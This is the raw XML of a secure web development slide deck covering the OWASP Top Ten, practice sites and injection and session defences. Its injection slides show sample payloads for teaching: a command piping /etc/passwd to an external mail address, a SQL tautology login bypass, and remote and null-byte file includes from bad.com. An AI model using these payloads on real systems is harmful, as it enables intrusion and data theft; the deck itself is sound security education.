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1045" r:id="rId2"/>
    <p:sldId id="1061" r:id="rId3"/>
    <p:sldId id="1062" r:id="rId4"/>
    <p:sldId id="1063" r:id="rId5"/>
    <p:sldId id="1064" r:id="rId6"/>
    <p:sldId id="521" r:id="rId7"/>
    <p:sldId id="1065" r:id="rId8"/>
    <p:sldId id="466" r:id="rId9"/>
    <p:sldId id="1066" r:id="rId10"/>
    <p:sldId id="1067" r:id="rId11"/>
    <p:sldId id="1033" r:id="rId12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8DA332-498F-42A6-A2C9-CF447893222E}">
          <p14:sldIdLst>
            <p14:sldId id="1045"/>
            <p14:sldId id="1061"/>
            <p14:sldId id="1062"/>
            <p14:sldId id="1063"/>
            <p14:sldId id="1064"/>
            <p14:sldId id="521"/>
            <p14:sldId id="1065"/>
            <p14:sldId id="466"/>
            <p14:sldId id="1066"/>
            <p14:sldId id="1067"/>
            <p14:sldId id="103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 Iribarren" initials="" lastIdx="7" clrIdx="0"/>
  <p:cmAuthor id="1" name="Nikos Kasioumis" initials="" lastIdx="3" clrIdx="1"/>
  <p:cmAuthor id="2" name="Sebastian Lopienski" initials="" lastIdx="3" clrIdx="2"/>
  <p:cmAuthor id="3" name="Jerome Caffaro" initials="" lastIdx="1" clrIdx="3"/>
  <p:cmAuthor id="4" name="Harris Tzovanakis" initials="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5F09"/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358"/>
    <p:restoredTop sz="50000" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="131" d="100"/>
          <a:sy n="131" d="100"/>
        </p:scale>
        <p:origin x="760" y="184"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="120" d="100"/>
        <a:sy n="120" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr varScale="1">
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="1408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49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417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60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09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43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14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7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7789E-84FF-459F-BED9-B24ED7B2915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79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77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902073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08648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19" y="476672"/>
            <a:ext cx="8744843" cy="648171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19" y="1412776"/>
            <a:ext cx="8744843" cy="4968552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6381327"/>
            <a:ext cx="5768280" cy="340147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/>
              <a:t>Sebastian Lopienski – Secure software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>development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6381327"/>
            <a:ext cx="5768280" cy="340148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Sebastian Lopienski – Secure software development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19" y="476672"/>
            <a:ext cx="8744843" cy="648171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320480" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2600"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="23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316288" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2600"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="23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6381328"/>
            <a:ext cx="5696272" cy="36004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Sebastian Lopienski – Secure software development</a:t>
            </a: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19" y="476672"/>
            <a:ext cx="8744843" cy="648171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr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44823"/>
            <a:ext cx="4040188" cy="33005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844823"/>
            <a:ext cx="4041775" cy="33005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19" y="836613"/>
            <a:ext cx="8744843" cy="64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19" y="1628800"/>
            <a:ext cx="8744843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199" y="6389241"/>
            <a:ext cx="2443163" cy="3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www.owasp.org/index.php/OWASP_Juice_Shop_Project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google-gruyere.appspo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vwa.co.uk/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://juice-shop.herokuapp.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bkimminich/juice-shop" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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hneier.com/blog/archives/2008/03/the_security_mi_1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Category:OWASP_Top_Ten_Projec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800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typical web vulnerabilities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Introduction to Web penetration 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917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web security challenges/courses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200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google Gruyere</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://google-gruyere.appspot.com/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OWASP Juice Shop</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/OWASP_Juice_Shop_Project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>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/bkimminich/juice-shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://juice-shop.herokuapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Damn Vulnerable Web Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://dvwa.co.uk/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="gruyere-7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700808"/>
            <a:ext cx="846584" cy="846584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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49331"/>
            <a:ext cx="1099730" cy="6238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169F5C-00C8-FB4C-B121-34051E5B4E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0082" y="2860398"/>
            <a:ext cx="1270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784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Don’t assume; try!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>“What if I change this value?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser is yours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bypass client-side checks, manipulate data, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>alter or inject requests sent to the server etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… and you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>should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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Build a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security mindset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>think not how systems work, but how they can break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.schneier.com/blog/archives/2008/03/the_security_mi_1.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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2005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Ten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C3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Open Web Application Security Project)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top Ten flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/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A1 	Injection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A2 	Broken Authentication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A3 	Sensitive Data Exposure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A4	XML External Entities (XXE)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A5	Broken Access Control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A6 	Security Misconfiguration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A7 	Cross-Site Scripting (XSS)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A8 	Insecure Deserialization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A9 	Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A10 Insufficient Logging and Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92164" name="Picture 4" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.05 - CERN course\materials\owasp-logo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77712"/>
            <a:ext cx="2001283" cy="84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11D2DC-EDCB-37E0-5724-1FE7417DD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084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A1: Injection flaws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/>
              <a:t>Executing code provided (injected) by attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>SQL injection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1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>OS command injection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1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>LDAP, XPath, SSI injection etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500"/>
              <a:t>Solutions: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> values (use escape functions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameterized queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>(SQL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>enforce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>least privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>when accessing a DB, OS etc.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66800" y="3356992"/>
            <a:ext cx="83629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fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>confirmation.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@fake.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      | mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@real.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49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66800" y="2222252"/>
            <a:ext cx="83629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en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select count(*) from users where name = ’$name’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>anything’ or ’x’ = ’x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" b="1" dirty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369050" y="5072063"/>
            <a:ext cx="1560513" cy="461962"/>
            <a:chOff x="6369544" y="5046674"/>
            <a:chExt cx="1560042" cy="461665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7416978" y="5118065"/>
              <a:ext cx="357080" cy="3569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526660" y="5118065"/>
              <a:ext cx="214247" cy="3569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241" name="TextBox 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6369544" y="5046674"/>
              <a:ext cx="156004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lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>’ -&gt; \’</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400"/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1CC6-1766-AD96-84EC-B84494620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813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71563" y="3671516"/>
            <a:ext cx="7715250" cy="50006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71563" y="4566866"/>
            <a:ext cx="7715250" cy="50006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1563" y="5478091"/>
            <a:ext cx="7715250" cy="50006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1563" y="2780928"/>
            <a:ext cx="7715250" cy="500063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62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Similar to A1: Malicious file execution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7286625" y="5781303"/>
            <a:ext cx="1700213" cy="928688"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73121"/>
              <a:gd name="adj2" fmla="val -4690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string ends at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%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, so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.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not added</a:t>
            </a:r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Remote, hostile content provided by the attacker</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is included, processed or invoked by the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote file include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(RFI) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local file include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone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   include(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_GET["page"]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 . ".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php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marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone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http://site.com/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>└</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty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 include("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>home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.php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marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" b="1" dirty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  <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone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http://site.com/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="21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http://bad.com/exploit.txt?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>└</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty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 include("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://bad.com/exploit.txt?.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php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marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" b="1" dirty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  <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone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http://site.com/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="21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C:\ftp\upload\exploit.png%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>└</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty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 include("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\ftp\upload\exploit.png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");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" i="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>harden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config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254DB5-E2E9-2181-6F81-1C6B7F46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384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 animBg="1"/>
      <p:bldP spid="4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A2: Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mgmt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860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Understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session hijacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>techniques, e.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>session fixation (attacker sets victim’s session id)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>stealing session id: eavesdropping (if not https), XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trust the solution offered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>by the platform / language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and follow its recommendations (for code, configuration etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Additionally:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>generate new session ID on login (do not reuse old ones)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>use cookies for storing session id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>set session timeout and provide logout possibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>consider enabling “same IP” policy (not always possible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>check referer (previous URL), user agent (browser version)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
